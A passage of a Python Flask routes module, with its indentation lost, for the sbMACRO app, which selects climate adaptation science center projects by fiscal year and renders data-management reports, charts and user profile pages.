# super(F, i).__init__()
# # i.name = BooleanField('static field')
# i.submit = SubmitField(buttonText)
# form = F('Refresh Metadata')
class F(FyForm):
pass
form = F()
return(render_template('index.html', **locals(),
title="Welcome to sbMACRO"))
@bp.route('/metadata', methods=['GET', 'POST'])
def metadata():
tag_to_search = request.form['tag_to_search']
custom_stopwords = ['climate', 'change']
protocol = 'xml'
url_file_name = 'metadata_urls.csv'
us_states_file_name = 'us-states.csv'
us_states = []
with open(path_to_static + us_states_file_name, 'r') as file:
for state in file:
us_states.append(state.strip().lower())
stop_words = us_states + stopwords.words('english') + custom_stopwords
if request.method == 'POST':
casc_name = request.form['casc_name']
metadata_urls = []
with open(path_to_static + url_file_name, 'r') as file:
for line in file:
casc, url = line.split(',')
if casc == casc_name:
metadata_urls.append(url)
# write to csv to be read by wordcloud module
write_metadata(casc_name, tag_to_search, metadata_urls, stop_words)
return ''
@bp.route('/fiscal_years')
@bp.route('/fiscalyears')
@bp.route('/select_fiscalyear', methods=['GET', 'POST']) # Also accepts
@bp.route('/select_fiscalyears', methods=['GET', 'POST']) # Default
def fiscalyear():
"""Retrieve Fiscal Years and display for selection by user."""
cascs = db.session.query(casc).order_by(casc.name).all()
cascs_and_fys = {}
class F(FyForm):
pass
list_fy = []
for curr_casc in cascs:
cascs_and_fys[curr_casc.name] = {}
cascs_and_fys[curr_casc.name]["id"] = curr_casc.id
fys = db.session.query(FiscalYear).order_by(
FiscalYear.name).filter(
FiscalYear.casc_id == curr_casc.id).all()
cascs_and_fys[curr_casc.name]["fiscal_years"] = []
for fy in fys:
fiscal_year = {}
list_fy.append("fy" + str(fy.id))
fiscal_year["id"] = fy.id
fiscal_year["name"] = fy.name
cascs_and_fys[curr_casc.name]["fiscal_years"].append(fiscal_year)
setattr(F, "fy" + str(fy.id), BooleanField(fy.name))
form = F()
if form.validate_on_submit():
id_list = []
projects = []
for fy in list_fy:
fy_attr = getattr(form, fy)
selected = fy_attr.data
if selected:
id_list.append(fy.replace("fy", ""))
print('length of id_list:', len(id_list))
for i in id_list:
fy_model = db.session.query(FiscalYear).get(i)
for proj in fy_model.projects:
project_dict = {}
project_dict['fy_id'] = i
project_dict['casc_id'] = fy_model.casc_id
project_dict['proj_id'] = proj.id
projects.append(project_dict)
session["projects"] = projects
print('length of projects:', len(projects))
return redirect(url_for('main.report'))
elif request.method == 'GET':
pass
return render_template('fiscalYears.html',
form=form,
cascs_and_fys=cascs_and_fys,
title="Select Fiscal Years"), 400
@bp.route('/update_db', methods=['GET', 'POST'])
def update_db():
"""Retrieve CASCs and display for selection by user."""
update_graphs = False
update_search_table = False
update_proj_matches = False
cascs_to_update = []
list_of_cascs = ['Alaska', 'North Central', 'Northeast',
'Northwest', 'Pacific', 'South Central',
'Southeast', 'Southwest', 'National']
class F(FyForm):
pass
# set form attributes for the 'update_search_table' checkbox
setattr(F, str('update_search_table'), BooleanField('update_search_table'))
# set form attributes for the 'update_graphs' checkbox
setattr(F, str('update_graphs'), BooleanField('update_graphs'))
# set form attributes for the 'update_proj_matches' checkbox
setattr(F, str('update_proj_matches'), BooleanField('update_proj_matches'))
# set form attributes for the casc checkboxes
for curr_casc in list_of_cascs:
setattr(F, str(curr_casc), BooleanField(curr_casc))
form = F()
if form.validate_on_submit():
if getattr(form, 'update_search_table').data:
update_search_table = True
if getattr(form, 'update_graphs').data:
update_graphs = True
if getattr(form, 'update_proj_matches').data:
update_proj_matches = True
for csc in list_of_cascs:
csc_attr = getattr(form, csc)
selected = csc_attr.data
if selected:
cascs_to_update.append(csc)
session['update_graphs'] = update_graphs
session['update_search_table'] = update_search_table
session['update_proj_matches'] = update_proj_matches
session['cascs_to_update'] = cascs_to_update
return redirect(url_for('main.updates'))
elif request.method == 'GET':
pass
return render_template('update_db.html',
form=form, list_of_cascs=list_of_cascs), 400
# @socketio.on('connect', namespace='/test')
@bp.route('/updates')
def updates():
"""Refresh master details table and update the cascs selected for update"""
# --- select where to update from ---
source = 'sciencebase'
# source = 'file'
update_graphs = session['update_graphs']
if update_graphs:
print('Starting graph update thread')
graph_update_thread = multiprocessing.Process(target=graphs_update)
graph_update_thread.start()
update_search_table = session['update_search_table'] # same as master table
if update_search_table:
print('Starting search table update thread')
search_table_update_thread = multiprocessing.Process(
target=search_table_update, args=(source,)
)
search_table_update_thread.start()
update_proj_matches = session['update_proj_matches']
if update_proj_matches:
print('Starting project matches update thread')
proj_matches_update_thread = multiprocessing.Process(
target=proj_matches_update
)
proj_matches_update_thread.start()
cascs_to_update = session['cascs_to_update']
if cascs_to_update:
print('Starting CASC updates...')
casc_update_thread = multiprocessing.Process(
target=casc_update, args=(cascs_to_update,)
)
casc_update_thread.start()
return render_template("updates.html", update_graphs=update_graphs,
update_search_table=update_search_table,
update_proj_matches=update_proj_matches,
cascs_to_update=cascs_to_update
)
@bp.route('/trends', methods = ['GET', 'POST'])
def trends():
return render_template('trends.html')
@bp.route('/bursts', methods = ['GET', 'POST'])
def bursts():
return render_template('bursts.html')
@bp.route('/write_exclusions', methods = ['GET', 'POST'])
def write_exclusions():
if request.method == 'POST':
exclusion_list = request.form.getlist('exclusions[]')
exclusion_file_name = 'exclusions.csv'
write_header = False
if not os.path.exists(path_to_static + exclusion_file_name):
write_header = True
with open(path_to_static + exclusion_file_name, 'a') as file:
if write_header:
file.write('phrase\n')
for phrase in exclusion_list:
file.write(phrase + '\n')
return ''
@bp.route('/casc_projects/<params>', methods = ['GET', 'POST'])
def casc_projects(params):
casc_name, num_projects, num_datasets = params.split('|')
return render_template('casc_projects.html',
casc_name=casc_name,
num_projects=num_projects,
num_datasets=num_datasets
)
@bp.route('/proj_compare', methods=['GET', 'POST'])
def proj_compare():
return render_template('proj_compare.html')
@bp.route('/projects', methods=['GET', 'POST'])
@bp.route('/select_project', methods=['GET', 'POST'])
@bp.route('/select_projects', methods=['GET', 'POST'])
def project():
"""Display and implement selection/searching for projects by URL."""
if request.method == 'POST':
sb_urls = request.form.getlist("SBurls")
print("sb_urls:")
pprint(sb_urls)
projects = []
for url in sb_urls:
project_dict = {}
proj = db.session.query(Project).filter(Project.url == url).first()
if proj is None:
print("---Error: Could not find project for {}".format(url))
continue
else:
print("Found: {0}: {1}".format(proj.id, proj.name))
fys = proj.fiscal_years
if len(fys) > 1:
project_dict['fy_id'] = []
project_dict['casc_id'] = []
for fy in fys:
project_dict['fy_id'].append(fy.id)
project_dict['casc_id'].append(fy.casc_id)
else:
fy = fys[0]
project_dict['fy_id'] = fy.id
project_dict['casc_id'] = fy.casc_id
project_dict['proj_id'] = proj.id
projects.append(project_dict)
session["projects"] = projects
return redirect(url_for('main.report'))
return(render_template('projects.html',
title="Select Projects to Report")), 400
@bp.route('/report')
def report():
"""Gather appropriate report information and display."""
excel_file = 'CASC Data Management Tracking for Projects - v2.xlsx'
try:
project_list = session["projects"]
except KeyError:
return render_template("error.html",
message="Please select Fiscal Year \
First To Generate Report"
)
# except TypeError:
# return render_template("error.html", message="Please Login ")
projects = []
workbook = None
# Decide whether to load project tracking excel workbook
if current_user.is_authenticated and current_user.access_level > 0:
for project in project_list:
casc_item = db.session.query(casc).get(project['casc_id'])
if get_sheet_name(casc_item.name):
# Load workbook
try:
print('Opening {}...'.format(excel_file))
workbook = openpyxl.load_workbook(excel_file)
print('Successfully opened {}'.format(excel_file))
except Exception:
print('File error: {}'.format(excel_file))
# No need to continue if workbook has just been loaded
break
class ReportItem(object):
"""Object to be passed to front-end for display in table and modal."""
name = None
id = None
sb_id = None
url = None
obj_type = None
data_in_project_GB = None
num_of_files = None
total_data_in_fy_GB = None
timestamp = None
dmp_status = None
pi_list = []
summary = None
history = None
item_breakdown = None
potential_products = None
products_received = []
file_breakdown = []
# Possibly necessary info:
casc = None
fiscal_year = None
project = None
item = None
def __init__(i, obj_type, obj_db_id, fy_db_id, casc_db_id):
"""Initialize ReportItem class object.
Arguments:
obj_type -- (string) 'project', 'fiscal year', 'casc', 'item',
'sbfile', or 'problem item' to determine the type
of object being created.
obj_db_id -- (int) the database id for the item being created.
fy_db_id -- (int or list) the database id for the item's
fiscal year of concern.
casc_db_id -- (int or list) the database id for the item's
casc year of concern.
"""
sheet = {}
if obj_type == 'project':
i.obj_type = obj_type
proj = db.session.query(Project).filter(
Project.id == obj_db_id).first()
if proj is None:
raise Exception # It has to be there somewhere...
else:
i.name = proj.name
i.id = obj_db_id
i.sb_id = proj.sb_id
i.url = proj.url
# convert from MB -> GB
i.data_in_project_GB = proj.total_data / 1000
i.num_of_files = proj.files.count()
if fy_db_id is list:
i.fiscal_year = []
i.casc = []
i.total_data_in_fy_GB = []
for fy_id in fy_db_id:
fy = db.session.query(FiscalYear).get(fy_id)
i.fiscal_year.append(fy.name)
casc_model = db.session.query(casc).get(fy.casc_id)
i.casc.append(casc_model.name)
# convert from MB -> GB
i.total_data_in_fy_GB.append(
fy.total_data / 1000)
else:
fy = db.session.query(FiscalYear).get(fy_db_id)
i.fiscal_year = fy.name
casc_model = db.session.query(casc).get(casc_db_id)
i.casc = casc_model.name
# convert from MB -> GB
i.total_data_in_fy_GB = fy.total_data / 1000
i.timestamp = proj.timestamp
i.pi_list = []
for pi in proj.principal_investigators:
curr_pi = {'name': pi.name, 'email': pi.email}
i.pi_list.append(curr_pi)
i.summary = proj.summary
i.products_received = []
for item in proj.items:
curr_item = {'name': item.name, 'url': item.url}
i.products_received.append(curr_item)
# Things that depend on user access level:
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
# ACTION ITEM: In a production app, you likely
# want to save these credentials in a
# persistent database instead.
session['credentials'] = credentials_to_dict(
credentials)
try:
# DMP Status
i.dmp_status = sheet[proj.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
# History
i.history = sheet[proj.sb_id]['History']
if i.history is None or\
i.history.isspace() or\
i.history == "":
i.history = "No data steward \
history provided"
# Potential Products
i.potential_products = \
sheet[proj.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential \
products \
provided"
except KeyError:
i.dmp_status = "Project not currently \
tracked by Data Steward"
i.history = "Project not currently \
tracked by Data Steward"
i.potential_products = "Project not currently \
tracked by Data Steward"
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login \
to view this content."
i.file_breakdown = []
proj_file_list = []
for sbfile in proj.files:
proj_file_list.append(sbfile.id)
if len(proj_file_list) > 0:
file_breakdown_list = db.session.query(
SbFile.content_type, db.func.count(
SbFile.content_type)).group_by(
SbFile.content_type).filter(
# SQLite limits the number of IN-clause parameters to 999
SbFile.id.in_(\
proj_file_list[:999])).all()
proj_file_list[:] = []
for _tuple in file_breakdown_list:
temp_dict = {}
temp_dict['label'] = _tuple[0]
temp_dict['count'] = _tuple[1]
proj_file_list.append(temp_dict)
i.file_breakdown = sorted(
proj_file_list,
key=lambda k: k['count'],
reverse=True)
elif obj_type == 'fiscal year':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'casc':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'sbfile':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'problem item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
for project in project_list:
new_obj = ReportItem(
'project', project['proj_id'],
project['fy_id'],
project['casc_id']
)
projects.append(new_obj.__dict__)
return render_template("report.html", projects=projects)
@bp.route('/verticalbar')
def verticalbar():
"""Gather appropriate report information and display."""
excel_file = 'CASC Data Management Tracking for Projects - v2.xlsx'
project_list = session["projects"]
projects = []
workbook = None
# Decide whether to load project tracking excel workbook
if current_user.is_authenticated and current_user.access_level > 0:
for project in project_list:
casc_item = db.session.query(casc).get(project['casc_id'])
if get_sheet_name(casc_item.name):
# Load workbook
try:
print('Opening {}...'.format(excel_file))
workbook = openpyxl.load_workbook(excel_file)
print('Successfully opened {}'.format(excel_file))
except Exception:
print('File error: {}'.format(excel_file))
# No need to continue if workbook has just been loaded
break
class ReportItem(object):
"""Object to be passed to front-end for display in table and modal."""
name = None
id = None
sb_id = None
url = None
obj_type = None
data_in_project_GB = None
num_of_files = None
total_data_in_fy_GB = None
timestamp = None
dmp_status = None
pi_list = []
summary = None
history = None
item_breakdown = None
potential_products = None
products_received = []
file_breakdown = []
# Possibly necessary info:
casc = None
fiscal_year = None
project = None
item = None
def __init__(i, obj_type, obj_db_id, fy_db_id, casc_db_id):
"""Initialize ReportItem class object.
Arguments:
obj_type -- (string) 'project', 'fiscal year', 'casc', 'item',
'sbfile', or 'problem item' to determine the type
of object being created.
obj_db_id -- (int) the database id for the item being created.
fy_db_id -- (int or list) the database id for the item's
fiscal year of concern.
casc_db_id -- (int or list) the database id for the item's
casc year of concern.
"""
sheet = {}
if obj_type == 'project':
i.obj_type = obj_type
proj = db.session.query(Project).filter(
Project.id == obj_db_id).first()
if proj is None:
raise Exception # It has to be there somewhere...
else:
i.name = proj.name
i.id = obj_db_id
i.sb_id = proj.sb_id
i.url = proj.url
# convert from MB -> GB
i.data_in_project_GB = proj.total_data / 1000
i.num_of_files = proj.files.count()
if fy_db_id is list:
i.fiscal_year = []
i.casc = []
i.total_data_in_fy_GB = []
for fy_id in fy_db_id:
fy = db.session.query(FiscalYear).get(fy_id)
i.fiscal_year.append(fy.name)
casc_model = db.session.query(casc).get(fy.casc_id)
i.casc.append(casc_model.name)
# convert from MB -> GB
i.total_data_in_fy_GB.append(
fy.total_data / 1000)
else:
fy = db.session.query(FiscalYear).get(fy_db_id)
i.fiscal_year = fy.name
casc_model = db.session.query(casc).get(casc_db_id)
i.casc = casc_model.name
# convert from MB -> GB
i.total_data_in_fy_GB = fy.total_data / 1000
i.timestamp = proj.timestamp
i.pi_list = []
for pi in proj.principal_investigators:
curr_pi = {'name': pi.name, 'email': pi.email}
i.pi_list.append(curr_pi)
i.summary = proj.summary
i.products_received = []
for item in proj.items:
curr_item = {'name': item.name, 'url': item.url}
i.products_received.append(curr_item)
# Things that depend on user access level:
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
# ACTION ITEM: In a production app, you likely
# want to save these credentials in a
# persistent database instead.
session['credentials'] = credentials_to_dict(
credentials)
try:
# DMP Status
i.dmp_status = sheet[proj.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
# History
i.history = sheet[proj.sb_id]['History']
if i.history is None or i.history.isspace() or\
i.history == "":
i.history = "No data steward \
history provided"
# Potential Products
i.potential_products = \
sheet[proj.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential\
products provided"
except KeyError:
i.dmp_status = "Project not currently \
tracked by Data Steward"
i.history = "Project not currently \
tracked by Data Steward"
i.potential_products = "Project not currently \
tracked by \
Data Steward"
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login \
to view this content."
i.file_breakdown = []
proj_file_list = []
for sbfile in proj.files:
proj_file_list.append(sbfile.id)
if len(proj_file_list) > 0:
file_breakdown_list = db.session.query(
SbFile.content_type, db.func.count(
SbFile.content_type)).group_by(
SbFile.content_type).filter(
# sqlalchemy max query items is 999
SbFile.id.in_(\
proj_file_list[:999])).all()
proj_file_list[:] = []
for _tuple in file_breakdown_list:
temp_dict = {}
temp_dict['label'] = _tuple[0]
temp_dict['count'] = _tuple[1]
proj_file_list.append(temp_dict)
i.file_breakdown = sorted(
proj_file_list,
key=lambda k: k['count'],
reverse=True)
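# Note: the content-type query above only covers the first 999 file ids
# because of the 999-bound-parameter limit mentioned in the comment. A rough
# sketch (hypothetical, not wired in here) of covering every file by chunking
# the original id list before it is reused for the label/count dicts:
#
#   from collections import Counter
#   counts = Counter()
#   for start in range(0, len(proj_file_list), 999):
#       chunk = proj_file_list[start:start + 999]
#       rows = db.session.query(
#           SbFile.content_type,
#           db.func.count(SbFile.content_type)).group_by(
#           SbFile.content_type).filter(SbFile.id.in_(chunk)).all()
#       for ctype, cnt in rows:
#           counts[ctype] += cnt
#   # counts.items() would then play the role of file_breakdown_list.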
elif obj_type == 'fiscal year':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'casc':
pass # We don't do anything with casc objects on the
# front-end yet.
elif obj_type == 'item':
pass # We don't do anything with item objects on the
# front-end yet.
elif obj_type == 'sbfile':
pass # We don't do anything with sbfile objects on the
# front-end yet.
elif obj_type == 'problem item':
pass # We don't do anything with problem item objects on the
# front-end yet.
for project in project_list:
new_obj = ReportItem(
'project', project['proj_id'],
project['fy_id'],
project['casc_id']
)
projects.append(new_obj.__dict__)
return render_template("verticalbar.html", projects=projects)
@bp.route('/horizontalbar')
def horizontalbar():
"""Gather appropriate report information and display."""
excel_file = 'CASC Data Management Tracking for Projects - v2.xlsx'
project_list = session["projects"]
projects = []
workbook = None
# Decide whether to load project tracking excel workbook
if current_user.is_authenticated and current_user.access_level > 0:
for project in project_list:
casc_item = db.session.query(casc).get(project['casc_id'])
if get_sheet_name(casc_item.name):
# Load workbook
try:
print('Opening {}...'.format(excel_file))
workbook = openpyxl.load_workbook(excel_file)
print('Successfully opened {}'.format(excel_file))
except Exception:
print('File error: {}'.format(excel_file))
# No need to continue if workbook has just been loaded
break
class ReportItem(object):
"""Object to be passed to front-end for display in table and modal."""
name = None
id = None
sb_id = None
url = None
obj_type = None
data_in_project_GB = None
num_of_files = None
total_data_in_fy_GB = None
timestamp = None
dmp_status = None
pi_list = []
summary = None
history = None
item_breakdown = None
potential_products = None
products_received = []
file_breakdown = []
# Possibly necessary info:
casc = None
fiscal_year = None
project = None
item = None
def __init__(i, obj_type, obj_db_id, fy_db_id, casc_db_id):
"""Initialize ReportItem class object.
Arguments:
obj_type -- (string) 'project', 'fiscal year', 'casc', 'item',
'sbfile', or 'problem item' to determine the type
of object being created.
obj_db_id -- (int) the database id for the item being created.
fy_db_id -- (int or list) the database id for the item's
fiscal year of concern.
casc_db_id -- (int or list) the database id for the item's
casc year of concern.
"""
sheet = {}
if obj_type == 'project':
i.obj_type = obj_type
proj = db.session.query(Project)\
.filter(Project.id == obj_db_id).first()
if proj is None:
raise Exception # It has to be there somewhere...
else:
i.name = proj.name
i.id = obj_db_id
i.sb_id = proj.sb_id
i.url = proj.url
# convert from MB -> GB
i.data_in_project_GB = proj.total_data / 1000
i.num_of_files = proj.files.count()
if isinstance(fy_db_id, list):
i.fiscal_year = []
i.casc = []
i.total_data_in_fy_GB = []
for fy_id in fy_db_id:
fy = db.session.query(FiscalYear).get(fy_id)
i.fiscal_year.append(fy.name)
casc_model = db.session.query(casc).get(fy.casc_id)
i.casc.append(casc_model.name)
# convert from MB -> GB
i.total_data_in_fy_GB.append(fy.total_data / 1000)
else:
fy = db.session.query(FiscalYear).get(fy_db_id)
i.fiscal_year = fy.name
casc_model = db.session.query(casc).get(casc_db_id)
i.casc = casc_model.name
# convert from MB -> GB
i.total_data_in_fy_GB = fy.total_data / 1000
i.timestamp = proj.timestamp
i.pi_list = []
for pi in proj.principal_investigators:
curr_pi = {'name': pi.name, 'email': pi.email}
i.pi_list.append(curr_pi)
i.summary = proj.summary
i.products_received = []
for item in proj.items:
curr_item = {'name': item.name, 'url': item.url}
i.products_received.append(curr_item)
# Things that depend on user access level:
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
try:
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
except Exception:
pass
# ACTION ITEM: In a production app, you likely
# want to save these credentials in a
# persistent database instead.
session['credentials'] = credentials_to_dict(credentials)
try:
try:
# DMP Status
i.dmp_status = \
sheet[proj.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
# History
i.history = sheet[proj.sb_id]['History']
if i.history is None or\
i.history.isspace() or\
i.history == "":
i.history = "No data \
steward history provided"
# Potential Products
i.potential_products = \
sheet[proj.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential \
products provided"
except KeyError:
i.dmp_status = "Project not currently \
tracked by Data Steward"
i.history = "Project not currently \
tracked by Data Steward"
i.potential_products = "Project not \
currently tracked \
by Data Steward"
except Exception:
pass
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login to \
view this content."
i.file_breakdown = []
proj_file_list = []
for sbfile in proj.files:
proj_file_list.append(sbfile.id)
if len(proj_file_list) > 0:
file_breakdown_list = db.session.query(
SbFile.content_type, db.func.count(
SbFile.content_type)).group_by(
SbFile.content_type).filter(
# sqlalchemy max query items is 999
SbFile.id.in_(proj_file_list[:999])).all()
proj_file_list[:] = []
for _tuple in file_breakdown_list:
temp_dict = {}
temp_dict['label'] = _tuple[0]
temp_dict['count'] = _tuple[1]
proj_file_list.append(temp_dict)
i.file_breakdown = sorted(
proj_file_list,
key=lambda k: k['count'],
reverse=True)
elif obj_type == 'fiscal year':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'casc':
pass # We don't do anything with casc objects on the
# front-end yet.
elif obj_type == 'item':
pass # We don't do anything with item objects on the
# front-end yet.
elif obj_type == 'sbfile':
pass # We don't do anything with sbfile objects on the
# front-end yet.
elif obj_type == 'problem item':
pass # We don't do anything with problem item objects on the
# front-end yet.
for project in project_list:
new_obj = ReportItem(
'project',
project['proj_id'],
project['fy_id'],
project['casc_id'])
projects.append(new_obj.__dict__)
return render_template("horizontalbar.html", projects=projects)
@bp.route('/treemap')
def treemap():
"""Gather appropriate report information and display."""
excel_file = 'CASC Data Management Tracking for Projects - v2.xlsx'
project_list = session["projects"]
projects = []
workbook = None
# Decide whether to load project tracking excel workbook
if current_user.is_authenticated and current_user.access_level > 0:
for project in project_list:
casc_item = db.session.query(casc).get(project['casc_id'])
if get_sheet_name(casc_item.name):
# Load workbook
try:
print('Opening {}...'.format(excel_file))
workbook = openpyxl.load_workbook(excel_file)
print('Successfully opened {}'.format(excel_file))
except Exception:
print('File error: {}'.format(excel_file))
# No need to continue if workbook has just been loaded
break
class ReportItem(object):
"""Object to be passed to front-end for display in table and modal."""
name = None
id = None
sb_id = None
url = None
obj_type = None
data_in_project_GB = None
num_of_files = None
total_data_in_fy_GB = None
timestamp = None
dmp_status = None
pi_list = []
summary = None
history = None
item_breakdown = None
potential_products = None
products_received = []
file_breakdown = []
# Possibly necessary info:
casc = None
fiscal_year = None
project = None
item = None
def __init__(i, obj_type, obj_db_id, fy_db_id, casc_db_id):
"""Initialize ReportItem class object.
Arguments:
obj_type -- (string) 'project', 'fiscal year', 'casc', 'item',
'sbfile', or 'problem item' to determine the type
of object being created.
obj_db_id -- (int) the database id for the item being created.
fy_db_id -- (int or list) the database id for the item's
fiscal year of concern.
casc_db_id -- (int or list) the database id for the item's
casc year of concern.
"""
sheet = {}
if obj_type == 'project':
i.obj_type = obj_type
proj = db.session.query(Project).filter(
Project.id == obj_db_id).first()
if proj is None:
raise Exception # It has to be there somewhere...
else:
i.name = proj.name
i.id = obj_db_id
i.sb_id = proj.sb_id
i.url = proj.url
# convert from MB -> GB
i.data_in_project_GB = proj.total_data / 1000
i.num_of_files = proj.files.count()
if isinstance(fy_db_id, list):
i.fiscal_year = []
i.casc = []
i.total_data_in_fy_GB = []
for fy_id in fy_db_id:
fy = db.session.query(FiscalYear).get(fy_id)
i.fiscal_year.append(fy.name)
casc_model = db.session.query(casc).get(fy.casc_id)
i.casc.append(casc_model.name)
# convert from MB -> GB
i.total_data_in_fy_GB.append(
fy.total_data / 1000)
else:
fy = db.session.query(FiscalYear).get(fy_db_id)
i.fiscal_year = fy.name
casc_model = db.session.query(casc).get(casc_db_id)
i.casc = casc_model.name
# convert from MB -> GB
i.total_data_in_fy_GB = fy.total_data / 1000
i.timestamp = proj.timestamp
i.pi_list = []
for pi in proj.principal_investigators:
curr_pi = {'name': pi.name, 'email': pi.email}
i.pi_list.append(curr_pi)
i.summary = proj.summary
i.products_received = []
for item in proj.items:
curr_item = {'name': item.name, 'url': item.url}
i.products_received.append(curr_item)
# Things that depend on user access level:
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
# ACTION ITEM: In a production app, you likely
# want to save these credentials in a
# persistent database instead.
session['credentials'] = credentials_to_dict(
credentials)
try:
# DMP Status
i.dmp_status = sheet[proj.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
# History
i.history = sheet[proj.sb_id]['History']
if i.history is None or\
i.history.isspace() or\
i.history == "":
i.history = "No data \
steward history provided"
# Potential Products
i.potential_products = \
sheet[proj.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential \
products provided"
except KeyError:
i.dmp_status = "Project not currently \
tracked by Data Steward"
i.history = "Project not currently \
tracked by Data Steward"
i.potential_products = "Project not \
currently tracked by Data Steward"
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login \
to view this content."
i.file_breakdown = []
proj_file_list = []
for sbfile in proj.files:
proj_file_list.append(sbfile.id)
if len(proj_file_list) > 0:
file_breakdown_list = db.session.query(
SbFile.content_type, db.func.count(
SbFile.content_type)).group_by(
SbFile.content_type).filter(
# sqlalchemy max query items is 999
SbFile.id.in_(\
proj_file_list[:999])).all()
proj_file_list[:] = []
for _tuple in file_breakdown_list:
temp_dict = {}
temp_dict['label'] = _tuple[0]
temp_dict['count'] = _tuple[1]
proj_file_list.append(temp_dict)
i.file_breakdown = sorted(
proj_file_list,
key=lambda k: k['count'],
reverse=True)
elif obj_type == 'fiscal year':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'casc':
pass # We don't do anything with casc objects on the
# front-end yet.
elif obj_type == 'item':
pass # We don't do anything with item objects on the
# front-end yet.
elif obj_type == 'sbfile':
pass # We don't do anything with sbfile objects on the
# front-end yet.
elif obj_type == 'problem item':
pass # We don't do anything with problem item objects on the
# front-end yet.
for project in project_list:
new_obj = ReportItem(
'project',
project['proj_id'],
project['fy_id'],
project['casc_id'])
projects.append(new_obj.__dict__)
return render_template("treemap.html", projects=projects)
@bp.route('/user/<username>')
@login_required
def user(username):
"""Load user and render user.html template if found, else 404."""
# Change to lowercase to make case insensitive
user = User.query.filter_by(username=username.lower()).first_or_404()
admin_email = current_app.config['ADMINS'][0]
return render_template('user.html', user=user, adminEmail=admin_email)
@bp.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
"""Define form for editing a profile."""
form = EditProfileForm(current_user.username)
if form.validate_on_submit():
if form.username.data:
current_user.username = str(form.username.data).lower()
if form.about.data:
current_user.about = str(form.about.data)
if form.email.data:
current_user.email = str(form.email.data)
if form.password.data:
# current_user.password = str(form.password.data)
user = current_user
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
return redirect(url_for('main.user',
username=current_user.username))
elif request.method == 'GET':
form.username.data = current_user.username
form.about.data = current_user.about
form.email.data = current_user.email
return render_template(
'edit_profile.html',
title='Edit Profile', form=form)
@bp.route('/search', methods=['GET', 'POST'])
@login_required
def search():
current_user.search_form = SearchForm()
d = str(current_user.search_form.data['search'])
if(len(d) == 0):
message = ["Please Enter The Keyword To Search"]
return render_template('error.html',
message=message, length=len(d)), 400
courses = MasterDetails.query.filter(
(MasterDetails.projectTitle.like('%'+d+'%')) |
